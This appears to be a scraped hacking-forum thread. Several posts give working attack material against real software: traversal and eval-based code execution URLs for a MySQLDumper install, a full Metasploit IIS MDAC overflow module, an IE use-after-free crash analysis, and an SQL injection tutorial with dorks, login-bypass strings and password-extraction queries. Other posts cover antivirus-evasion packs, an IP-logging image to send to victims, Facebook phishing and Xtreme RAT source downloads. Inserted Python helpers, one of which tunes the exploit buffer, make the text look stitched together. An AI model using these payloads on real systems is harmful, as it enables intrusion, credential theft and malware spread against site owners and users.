                parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
        }
        if (isset($_GET['config'])) $config_refresh=''; // prevent a re-invocation when the value is passed in from the content area
    }
    }
    */

    As you can see, we can traverse it. And if we look at the read_config() function:

    //inc/functions_global.php
    function read_config($file=false)
    {
        global $config,$databases;
        $ret=false;
        if (!$file) $file=$config['config_file'];
        // protect from including external files
        $search=array(':', 'http', 'ftp', ' ');
        $replace=array('', '', '', '');
        $file=str_replace($search,$replace,$file);
        if (is_readable($config['paths']['config'].$file.'.php'))
        {
            // to prevent modern server from caching the new configuration we need to evaluate it this way
            clearstatcache();
            $f=implode('',file($config['paths']['config'].$file.'.php'));
            $f=str_replace('<?php','',$f);
            $f=str_replace('?>','',$f);
            eval($f);
            $config['config_file']=$file;
            $_SESSION['config_file']=$config['config_file'];
            $ret=true;
        }
        return $ret;
    }

    This means a remote attacker can execute his/her code as PHP. (Notice: eval($f))

    Our exploit:
    [url]http://192.168.0.15/learn/cubemail/menu.php?config=../../ss[/url]
    where ss = ss.php

    #cat ss.php
    # e.g. the attacker uploaded his/her own file:
    echo 'Our command executed ' . getcwd();
    phpinfo();

    Print screen:
    [url]http://s007.radikal.ru/i302/1204/c3/fd5aac2a58c5.png[/url]

    There are also a lot of Cross-Site Scripting (XSS) vulnerabilities:
    Switch to: [url]http://192.168.0.15/learn/cubemail/sql.php?db=information_schema&dbid=0[/url]
    Enter: select '<script>alert(1);</script>'
    and click "Execute SQL Statement".

    Traversal:
    /* Vulnerable Code Section:
    //filemanagement.php
    <?php
    if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
    include ('./inc/header.php');
    include_once ('./language/'.$config['language'].'/lang.php');
    include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
    include_once ('./language/'.$config['language'].'/lang_config_overview.php');
    include_once ('./language/'.$config['language'].'/lang_main.php');
    include_once ('./inc/functions_files.php');
    include_once ('./inc/functions_sql.php');

    $msg='';
    $dump=array();
    if ($config['auto_delete']==1) $msg=AutoDelete();
    get_sql_encodings(); // get possible sql charsets and also get default charset

    //0=database 1=structure
    $action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
    $kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
    $expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
    $selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
    $destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
    $compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
    $dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
    $dk=str_replace(':','|',$dk); // remove : because of statusline
    $dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
    $dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;

    if ($action=='dl')
    {
        // Download of a backup file wanted
        $file='./'.$config['paths']['backup'].urldecode($_GET['f']);
        if (is_readable($file))
        {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename='.basename($file));
            header('Content-Transfer-Encoding: binary');
            header('Expires: 0');
            header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
            header('Pragma: public');
            header('Content-Length: '.(string) filesize($file));
            flush();
            $file=fopen($file,"rb");
            while (!feof($file))
            {
                print fread($file,round(100*1024));
                flush();
            }
            fclose($file);
        }
        //readfile($file);
        exit();
    }
    */

    Exploit:
    [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../config.php[/url]
    [url]http://192.168.0.15/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00[/url]

    This technique can be used by an attacker to download arbitrary files from the site/server.

    Print screen:
    [url]http://s017.radikal.ru/i431/1204/e2/9075bb5fecd4.png[/url]

    Information Disclosure:
    Try direct access to these files:
    [url]http://192.168.0.15/learn/cubemail/restore.php[/url]
    Generates a lot of Notices.
    [url]http://192.168.0.15/learn/cubemail/dump.php[/url]
    Generates a lot of Notices.
    [url]http://192.168.0.15/learn/cubemail/refresh_dblist.php[/url]
    Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147

    NOTE: Previous versions may be affected too, but this was not tested.

    ================================ EOF ======================================
    /AkaStep
    Live 1335567729

    I posted it with the PHP code but nothing showed up, it was all black, and after that I edited it.
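The two bugs in the advisory above have the same root cause: read_config() strips ':', 'http', 'ftp' and ' ' from the name, and the download handler strips nothing, so '../' (and, on the PHP versions of the day, a trailing %00) passes straight into the path. The following is an added example, not code from MySQLDumper or from the advisory: it mirrors the weak filter to show that traversal survives it, then shows the check a maintainer would put in front of both the config and the backup lookups: accept only a plain file name, resolve it, and confirm the result is still under the intended directory. The directory paths are assumptions for the example.

```python
import os
import re

# Hypothetical install paths; the advisory does not give the real ones.
CONFIG_DIR = "/srv/cubemail/config"
BACKUP_DIR = "/srv/cubemail/work/backup"


def weak_sanitize(name: str) -> str:
    """Mirror of the filter in read_config(): only ':', 'http', 'ftp' and ' '
    are removed, which blocks remote-URL includes but leaves '../' intact."""
    for token in (":", "http", "ftp", " "):
        name = name.replace(token, "")
    return name


# A plain file name: letters, digits, '_', '-' and '.'; no separators, no NUL.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,128}$")


def resolve_within(base_dir: str, user_value: str, suffix: str = ""):
    """Return the absolute path base_dir/<user_value><suffix> only when the
    value is a plain file name and the resolved path still lies under
    base_dir; return None otherwise (callers treat None as 'not found')."""
    if not SAFE_NAME.fullmatch(user_value):
        return None
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, user_value + suffix))
    # realpath collapses names such as '..' that the pattern lets through,
    # so the containment check below catches them.
    if os.path.commonpath([base, path]) != base or path == base:
        return None
    return path


def config_path(config: str):
    """Replacement for the unchecked $config['paths']['config'].$file.'.php'."""
    return resolve_within(CONFIG_DIR, config, ".php")


def backup_path(f: str):
    """Replacement for the unchecked './'.$config['paths']['backup'].$_GET['f']."""
    return resolve_within(BACKUP_DIR, f)


if __name__ == "__main__":
    for name in ("../../ss", "ss\x00", "mysqldumper"):
        print(repr(name), "->", repr(weak_sanitize(name)), "|", config_path(name))
    for name in ("../../config.php", "..", "backup_2012.sql.gz"):
        print(repr(name), "->", backup_path(name))
```

The regex does the bulk of the work; the realpath comparison is the second line of defence for names the regex accepts but that still escape the directory (a bare '..' is the obvious one), and it is what protects you if the pattern is later relaxed.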
  16. ##
    # $Id$
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpClient

        def initialize
            super(
                'Name'           => 'Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow',
                'Description'    => %q{
                    This module can be used to execute arbitrary code on IIS servers
                    that expose the /msadc/msadcs.dll Microsoft Data Access Components
                    (MDAC) Remote Data Service (RDS) DataFactory service. The service
                    is exploitable even when RDS is configured to deny remote connections
                    (handsafe.reg). The service is vulnerable to a heap overflow where the
                    RDS DataStub 'Content-Type' string is overly long. Microsoft Data
                    Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
                },
                'Author'         => 'patrick',
                'Version'        => '$Revision$',
                'Platform'       => 'win',
                'References'     =>
                    [
                        ['OSVDB', '14502'],
                        ['BID', '6214'],
                        ['CVE', '2002-1142'],
                        ['MSB', 'ms02-065'],
                        ['URL', 'http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html']
                    ],
                'Privileged'     => false,
                'Payload'        =>
                    {
                        'Space'           => 1024,
                        'BadChars'        => "\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&",
                        'StackAdjustment' => -3500,
                    },
                'DefaultOptions' =>
                    {
                        'EXITFUNC' => 'seh', # stops IIS from crashing... hopefully
                    },
                'Targets'        =>
                    [
                        # patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0
                        [ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll
                    ],
                'DefaultTarget'  => 0,
                'DisclosureDate' => 'Nov 20 2002'
            )

            register_options(
                [
                    OptString.new('PATH', [ true, "The path to msadcs.dll", '/msadc/msadcs.dll']),
                ], self.class)
        end

        def check
            res = send_request_raw({
                'uri'    => datastore['PATH'],
                'method' => 'GET',
            })

            if (res and res.code == 200)
                print_status("Server responded with HTTP #{res.code} OK")
                if (res.body =~ /Content-Type: application\/x-varg/)
                    print_good("#{datastore['PATH']} matches fingerprint application\/x-varg")
                    return Exploit::CheckCode::Detected
                end
            end

            # a 200 without the fingerprint, or no 200 at all, is not a hit
            return Exploit::CheckCode::Safe
        end

        def exploit
            sploit  = rand_text_alphanumeric(136)
            sploit[24,2] = Rex::Arch::X86.jmp_short(117)
            sploit << [target['Ret']].pack('V')
            sploit << payload.encoded

            data = 'Content-Type: ' + sploit

            res = send_request_raw({
                'uri'     => datastore['PATH'] + '/AdvancedDataFactory.Query',
                'headers' => { 'Content-Length' => data.length, },
                'method'  => 'POST',
                'data'    => data,
            })

            handler
        end
    end
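Before firing a module like the one above at a target you normally want to sanity-check the buffer it builds: that the short jump sits where the module says, that the return address is packed little-endian, and that the encoded payload contains none of the bytes the 'BadChars' list forbids (they would break the 'Content-Type: ' string the overflow travels in). This is an added example, not part of the Metasploit module: it reproduces the module's layout constants in Python so those checks can be run offline on any candidate payload. The filler is a fixed string here where the module uses rand_text_alphanumeric; everything else follows the constants shown in the module.

```python
import struct

# BadChars from the module's Payload hash, as a set of byte values.
BAD_CHARS = set(b"\x00\x09\x0a\x0b\x0d\x20:?<>=$\\/\"';=+%#&")

FILLER_LEN = 136     # rand_text_alphanumeric(136)
JMP_OFFSET = 24      # sploit[24,2] = Rex::Arch::X86.jmp_short(117)
JMP_REL = 117
RET = 0x75023783     # 'jmp eax' in ws2help.dll, the module's single target
PREFIX = b"Content-Type: "


def jmp_short(rel: int) -> bytes:
    """Two-byte x86 short jump (EB rel8), the encoding Rex::Arch::X86.jmp_short emits."""
    if not -128 <= rel <= 127:
        raise ValueError("rel8 out of range")
    return b"\xeb" + struct.pack("b", rel)


def build_buffer(payload: bytes, ret: int = RET,
                 filler: bytes = b"A" * FILLER_LEN) -> bytes:
    """Filler with the short jump patched in, then the packed return address,
    then the payload: the same order as the module's exploit method."""
    if len(filler) != FILLER_LEN:
        raise ValueError("filler must be %d bytes" % FILLER_LEN)
    buf = bytearray(filler)
    buf[JMP_OFFSET:JMP_OFFSET + 2] = jmp_short(JMP_REL)
    buf += struct.pack("<I", ret)      # [target['Ret']].pack('V')
    buf += payload
    return bytes(buf)


def request_body(payload: bytes) -> bytes:
    """The POST body the module sends: 'Content-Type: ' + buffer."""
    return PREFIX + build_buffer(payload)


def payload_offset() -> int:
    return FILLER_LEN + 4


def jmp_landing_offset() -> int:
    """Offset the short jump transfers to: next instruction (+2) plus rel8."""
    return JMP_OFFSET + 2 + JMP_REL


def bad_chars_in(data: bytes) -> set:
    """Byte values present in data that the module's BadChars list forbids."""
    return {b for b in data if b in BAD_CHARS}


if __name__ == "__main__":
    sample = b"\x90" * 8   # stand-in for payload.encoded
    body = request_body(sample)
    print("body length:", len(body))
    print("payload at", payload_offset(), "jump lands at", jmp_landing_offset())
    print("bad chars in sample:", bad_chars_in(sample))
```

With the module's constants the jump lands at offset 143 while the payload begins at 140, i.e. three bytes into the encoded payload; whether an encoder's leading bytes make that harmless is not something the module text says, so it is the kind of detail this check is meant to surface before a live run.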
  17. [CAL-2012-0023] Microsoft IE Developer Toolbar Remote Code Execution Vulnerability

    CVE ID: CVE-2012-1874
    http://technet.microsoft.com/en-us/security/bulletin/ms12-037
    http://blog.vulnhunt.com/index.php/2012/06/13/cal-2012-0023microsoft-ie-developer-toolbar-remote-code-execution-vulnerability/

    1 Affected Products
    =================
    Tested: Internet Explorer 9.0.8112.16421
    Also affected: IE8

    2 Vulnerability Details
    =====================
    Code Audit Labs (http://www.vulnhunt.com) has discovered a use-after-free vulnerability in the IE developer toolbar. The IE developer toolbar registers a global console object and adds its builtin members as CFunctionPointer objects holding a reference to the console object, but does not add the reference count correctly. If a property of the console object is accessed, it returns a CFunctionPointer, which causes a use-after-free that can lead to remote code execution.

    3 Analysis
    =========
    asm in jsdbgui.dll

    .text:1000B172 ; private: void __thiscall CConsole::AddAllBuiltinMembers(void)
    .text:1000B172 ?AddAllBuiltinMembers@CConsole@@AAEXXZ proc near
    .text:1000B172 ; CODE XREF: ATL::CComObject<CConsole>::CreateInstance(ATL::CComObject<CConsole> * *)+62p
    .text:1000B172
    .text:1000B172 var_10 = dword ptr -10h
    .text:1000B172 var_4 = dword ptr -4
    .text:1000B172
    .text:1000B172 push 4
    .text:1000B174 mov eax, offset loc_10039274
    .text:1000B179 call __EH_prolog3
    .text:1000B17E mov edi, ecx
    .text:1000B180 push 4
    .text:1000B182 pop esi
    .text:1000B183 push esi ; dwBytes
    .text:1000B184 call ??2@YAPAXI@Z ; operator new(uint)
    .text:1000B189 pop ecx
    .text:1000B18A mov [ebp+var_10], eax
    .text:1000B18D and [ebp+var_4], 0
    .text:1000B191 test eax, eax
    .text:1000B193 jz short loc_1000B1A3
    .text:1000B195 push offset aLog ; "log"
    .text:1000B19A mov ecx, eax
    .text:1000B19C call ??0?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@QAE@PBG@Z ; ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>(ushort const *)
    .text:1000B1A1 jmp short loc_1000B1A5
    .text:1000B1A3 ; ---------------------------------------------------------------------------
    .text:1000B1A3
    .text:1000B1A3 loc_1000B1A3: ; CODE XREF: CConsole::AddAllBuiltinMembers(void)+21j
    .text:1000B1A3 xor eax, eax
    .text:1000B1A5
    .text:1000B1A5 loc_1000B1A5: ; CODE XREF: CConsole::AddAllBuiltinMembers(void)+2Fj
    .text:1000B1A5 push eax
    .text:1000B1A6 or ebx, 0FFFFFFFFh
    .text:1000B1A9 push 1
    .text:1000B1AB mov ecx, edi
    .text:1000B1AD mov [ebp+var_4], ebx
    .text:1000B1B0 call ?AddBuiltinMethod@CParentExpando@@IAEXJPAV?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@@Z ; CParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>> *)
    .text:1000B1B5 push esi ; dwBytes

    .text:10021E5B push [ebp+arg_0]
    .text:10021E5E mov ecx, edi
    .text:10021E60 push esi
    .text:10021E61 call ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z ; CFunctionPointer::SetMethod(CParentExpando *,long)
    .text:10021E66 push [ebp+var_10]
    .text:10021E69 mov ecx, esi
    .text:10021E6B push [ebp+arg_0]
    .text:10021E6E call ?SetValue@CParentExpando@@IAEJJPAUIDispatch@@@Z ; CParentExpando::SetValue(long,IDispatch *)
    .text:10021E73 mov eax, [ebp+var_10]

    .text:1001B29B ; public: void __thiscall CFunctionPointer::SetMethod(class CParentExpando *, long)
    .text:1001B29B ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z proc near
    .text:1001B29B ; CODE XREF: CParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>> *)+4Ap
    .text:1001B29B
    .text:1001B29B arg_0 = dword ptr 8
    .text:1001B29B arg_4 = dword ptr 0Ch
    .text:1001B29B
    .text:1001B29B mov edi, edi
    .text:1001B29D push ebp
    .text:1001B29E mov ebp, esp
    .text:1001B2A0 mov eax, [ebp+arg_0]
    .text:1001B2A3 mov [ecx+8], eax
    .text:1001B2A6 mov eax, [ebp+arg_4]
    .text:1001B2A9 mov [ecx+0Ch], eax
    .text:1001B2AC pop ebp
    .text:1001B2AD retn 8
    .text:1001B2AD ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z endp

    4 Exploitable?
    ============
    If the freed memory is overwritten with controlled content, combined with a heap spray, this can cause remote code execution.

    5 Crash info:
    ===============
    ModLoad: 00110000 001c8000 C:\Program Files (x86)\Internet Explorer\iexplore.exe
    (1564.18e8): Access violation - code c0000005 (!!! second chance !!!)
    eax=0a1202d0 ebx=0365cc90 ecx=0a0afc70 edx=6e1effff esi=00000000 edi=0365cc48
    eip=088b0000 esp=0365cbd8 ebp=0365cbf0 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
    088b0000 ?? ???
    0:005> kb 3
    ChildEBP RetAddr Args to Child
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    0365cbd4 6e1fb3ac 00000004 0365cc90 003a3718 0x88b0000
    0365cbf0 5f69e657 0a1202d0 00000000 00000001 jsdbgui!CFunctionPointer::InvokeEx+0xbc
    0365cc64 5f658fa8 0365cc90 0365cd48 00000008 jscript9!DispatchHelper::GetDispatchValue+0x9d

    6 TIMELINE:
    ==========
    2012/1/15 Code Audit Labs of vulnhunt.com discovers this issue
    2012/1/20 we begin analysis
    2012/2/20 we confirmed this is an exploitable vulnerability and reported it to Microsoft
    2012/2/21 Microsoft replied that they received the report
    2012/6/14 Microsoft published this bulletin

    7 About Code Audit Labs:
    =====================
    Code Audit Labs secures your software, providing professional services including source code audit and binary code audit.
    Code Audit Labs: "You create value for customers, we protect your value"
    http://www.VulnHunt.com
  18. io.kent

    Greetings

    welcome ..
  19. Q: What is SQL injection?
    A: Injecting SQL queries into another database, or using queries to get auth bypass as an admin.

    Part 1: Basic SQL injection

    Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp.

    First we need to find a site, so start by opening Google. Now we type our dork. (Definition of "dork": a search entry for a certain type of site/exploit etc.) There is a large number of Google dorks for basic SQL injection. Here are the best:

    "inurl:admin.asp"
    "inurl:login/admin.asp"
    "inurl:admin/login.asp"
    "inurl:adminlogin.asp"
    "inurl:adminhome.asp"
    "inurl:admin_login.asp"
    "inurl:administratorlogin.asp"
    "inurl:login/administrator.asp"
    "inurl:administrator_login.asp"

    Now, what to do once we get to our site. The site should look something like this:

    welcome to xxxxxxxxxx administrator panel
    username :
    password :

    So what we do here is: in the username we always type "Admin", and for our password we type our SQL injection. Here is a list of SQL injections:

    ' or '1'='1
    ' or 'x'='x
    ' or 0=0 --
    " or 0=0 --
    or 0=0 --
    ' or 0=0 #
    " or 0=0 #
    or 0=0 #
    ' or 'x'='x
    " or "x"="x
    ') or ('x'='x
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or a=a--
    " or "a"="a
    ') or ('a'='a
    ") or ("a"="a
    hi" or "a"="a
    hi" or 1=1 --
    hi' or 1=1 --
    'or'1=1'

    There are many more, but these are the best ones that I know of. What this SQL injection is doing: confusing the fuck out of the database until it gives you auth bypass.

    So your input should look like this:
    username: Admin
    password: 'or'1'='1

    So click submit and you're in.
    NOTE: not all sites are vulnerable.

    Part 2: Injecting SQL queries to extract the admin username and password

    OK, so let's say we have a site: http://www.xxxxx.com/index.php?catid=1
    There is a list of dorks for sites like this:

    "inurl:index.php?catid="
    "inurl:news.php?catid="
    "inurl:index.php?id="
    "inurl:news.php?id="

    or the best in my view (full credit to qabandi for discovering this):
    "inurl:".php?catid=" site:xxx"

    So once you have your site http://www.xxxx.com/index.php?catid=1 we add a ' to the end of the URL, so the site is
    http://www.xxxx.com/index.php?catid=1'
    If there is an error of some sort then it is vulnerable.

    Now we need to find the number of columns in the SQL database, so we type:
    http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
    http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
    http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
    http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
    http://www.xxxx.com/index.php?catid=1 order by 5-- "error"
    So this database has 4 columns, because we got an error on 5. On some databases there are 2 columns and on some 200; it varies.

    Once we have the column number we try the UNION function:
    http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- (or whatever number of columns are in the database)
    If you see some numbers like 1 2 3 4 on the screen, or the column names: it might not show all numbers on the screen, but the numbers displayed are the ones you can replace to extract info from the DB.

    So now we need info about the DB. Let's say the numbers 2 and 4 showed up on the screen, so I will use my query on 2:
    http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
    The DB type and version will pop up on the screen.

    If the DB version is 4 or lower, then to extract the password you will need these queries:
    http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
    This should display the table containing the admin username and password, but if not then you will have to guess the table.

    So once you have your table (or not), type:
    http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
    where it says admintablename, type the table you found with
    concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)--
    or your guess. Once you have the right table name you should get the administrator password; then just do the same thing but type username instead of password. Sometimes the password is hashed and you need to crack it.

    Then see if you can get into the admin panel; if you can't, then try the admin panel finder script.

    Now if the database is version 5 or up, type:
    http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
    and that will display a list of all the tables. Once you have your table name, type the same thing as for version 4:
    http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
    then the same with username.

    But now, if it doesn't work for all those things, just toy around with all the little things: catid=1 or catid=-1, or instead of -- put /* or even nothing; just play around with those. But sometimes we also need to use version() or version@@, so sometimes:
    UNION SELECT version(),password,3,4 FROM admintable--
    or
    UNION SELECT version@@,password,3,4 FROM admintable--
  20. I don't know how you managed to knock out your internet, or what you did that made your connection drop, but I have tried the program myself and it works acceptably well; it's not great, but it works..
  21. A collection of videos and papers, as well as snippets, put together over a few years relating to dodging antivirus scanners. SWF videos will need to be played via your web browser or a supported player.

    Hex Edit
    Finding Signatures Detected In Malware_Fifo.avi
    hex edit bifrost 01.txt
    hex edit bifrost 02.txt
    Hex Editing #3.pdf
    Hex Editing a Crypter.swf
    Ntpacker ud stub making.doc

    Binding
    ud binder by The Ozz.pdf

    Entry Point Changing
    Entry Point Changing #1.pdf
    Entry Point Changing by Delikon.pdf
    EP tuto.swf

    Manual Packing
    BasicNOPcrackingVideoIDEspinner.avi
    bifrost_ud.avi
    Furax Undetected Video.avi
    Manual packing #2.pdf
    ManualPacking.avi
    ozzis_new_vid_1.avi
    xor2.flv

    Packing
    kav-proactivasI_en.swf
    Packing Bifrost.swf
    registro_en.swf

    Splitting
    SignatureZero Video Tutorial by iNs.avi

    Download:
    Part 1 https://rapidshare.com/#!download|457p7|1564372942|Avioding_The_Av.part1.rar|100431|0|0
    Part 2 https://rapidshare.com/#!download|457p4|3856498573|Avioding_The_Av.part2.rar|100431|0|0
    Part 3 https://rapidshare.com/#!download|457p7|191180330|Avioding_The_Av.part3.rar|61772|0|0

    Enjoy...
  22. download : FreakShare - Easy One-Click File Hosting

    scan : novirusthanks
    Report date: 2012-09-09 21:01:59 (GMT 1)
    File name: udpunicorn-exe
    File size: 373248 bytes
    MD5 hash: c3e859051910f00d525df355a294ae56
    SHA1 hash: 0e98d7bf8dddc91b86d5058af19f7c620854ae44
    Detection rate: 0 on 14 (0%)
    Status: CLEAN
    Asquared 21:01:59 5.1.0.3
    Avast 21:01:59 5.0
    AVG 21:01:59 10.0.0.1190
    Avira 21:01:59 7.11.7.12
    BitDefender 21:01:59 7.0.0.2555
    ClamAV 21:01:59 0.97.4
    Comodo 21:01:59 1.0
    DrWeb 21:01:59 5.0.2
    Fprot 21:01:59 6.0
    IkarusT3 21:01:59 T31001097
    Panda 21:01:59 10.0.3.0
    STOPZilla 21:01:59 5.0.0.0
    TrendMicro 21:01:59 9.200.0.1012
    VBA32 21:01:59 3.12.0.300
    Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org

    And here is a very interesting piece of code:

    Hello, I'll show you how to get the IP with an image in PHP, because as you know a person's IP is the most important thing there is if we need to do any kind of attack or some pentesting. It's simple: open a notepad and paste this code:

    <?php
    $file = "log.txt";                                // name of the file where we keep the reports
    $ip = $_SERVER["REMOTE_ADDR"];                    // the IP is stored in this variable
    $date = date("Ymd H:i:s");                        // date and time (usually the server's)
    $system = $_SERVER['HTTP_USER_AGENT'];            // this gives several details about browser and operating system
    $conproxy = isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : ""; // if a proxy is used to hide the real IP, it would be here
    $log = "DATE: $date SYSTEM: $system IP: $ip IPPROXY: $conproxy\n";
    $fp = fopen($file, "a");
    fwrite($fp, $log);
    fclose($fp);
    header("Content-type: image/png");                // serve the image so the visitor sees nothing unusual
    $imagen_png = file_get_contents("IMAGE_URL_HERE"); // put the link of any image here (the post gives no URL)
    echo $imagen_png;
    ?>

    Ready. Now save it with the .php extension, then create another file called "log.txt" in the same folder, upload the two files to the hosting page and send it to your victim. That's all.

    Greetings
  23. Written completely in Perl, this suite of tools covers a lot of the basics for penetration testing and vulnerability detection automation. This suite of tools (formerly known as the "pCrack Suite") is used primarily for web application vulnerability testing. It includes various tools:

    Hellfire - LFI Automation Tool
    LogInjector - Code Injection Tool for Web Server Logs (LFI Attack)
    Smsi (SimplyMySQLi) - Simple MySQL Injector
    XSS tools like StrEncode, an XSS String Encoding Tool

    Video Demos
    Created by Camtasia Studio 7
    http://weaknetlabs.com/pcrack/pcrack.mp4

    Download
    Downloads - pweb-suite - Perl based web application penetration testing tools - Google Project Hosting

    Author(s)
    Trevelyn - weaknetlabs[-at-]gmail
  24. http://www.youtube.com/watch?v=WZ1ySR-IFAE&feature=player_embedded

    This tutorial explains how to make a Facebook scam so we can obtain the victim's login data!

    Code "robando.php": download robando.php

    It's in Spanish, but it's perfectly understandable.
  25. download https://dl.dropbox.com/u/81704696/Xtreme%20RAT%20source%20code%20.rar
    pass: level-23.biz

    Xtreme RAT Source Code
    Price: €350 EUR
    https://sites.google.com/site/nxtremerat/

    Take advantage of the opportunity.

    Reupload OK.

    edit// Explanation in a Flash .swf of how the program works, by Kombaal
    SourceForge http://www.mediafire.com/?mdqjc5l4f0yd6wa

    edit// 1300 visitors, not a single comment, not a single like, absolutely nothing. It's sad when you see something like this. That's how it is.